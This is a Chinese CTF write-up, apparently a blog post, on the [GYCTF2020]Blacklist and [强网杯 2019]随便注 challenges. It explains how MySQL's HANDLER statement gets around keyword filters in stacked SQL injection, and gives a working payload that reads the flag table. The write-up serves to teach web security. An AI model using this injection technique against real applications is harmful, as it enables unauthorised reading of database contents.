HANDLER进行堆叠注入

HANDLER进行堆叠注入

[GYCTF2020]Blacklist

image-20201120161425003

过滤了很多的关键词

image-20201120161508722

你可以尽情堆叠,但是令人难过的是你读不出来,也不能像强网杯那样alert改名字。

但是我们还有handler这个东西

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。

HANDLER tbl_name OPEN [ [AS] alias]
 
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
 
HANDLER tbl_name CLOSE

通过HANDLER tbl_name OPEN打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。
通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的句柄。

通过索引去查看的话可以按照一定的顺序,获取表中的数据。
通过HANDLER tbl_name READ index_name FIRST,获取句柄第一行(索引最小的一行),NEXT获取下一行,PREV获取前一行,LAST获取最后一行(索引最大的一行)。

通过索引列指定一个值,可以指定从哪一行开始。
通过HANDLER tbl_name READ index_name = value,指定从哪一行开始,通过NEXT继续浏览。

image-20201120162237893

使用:

?inject=1';HANDLER `FlagHere` OPEN;HANDLER `FlagHere` READ FIRST;

来读取内容,get到flag

同时,这种解法也适用于强网杯

[强网杯 2019]随便注

show tables看看都有什么表。

image-20201120165436885

网上的wp有改表名的,也有预处理的,在此不再赘述,我们直接使用handler:

image-20201120170055119

数据库真是太美妙了

posted @ 2020-11-20 17:22  DorinXL  阅读(300)  评论(0编辑  收藏  举报
👨‍💼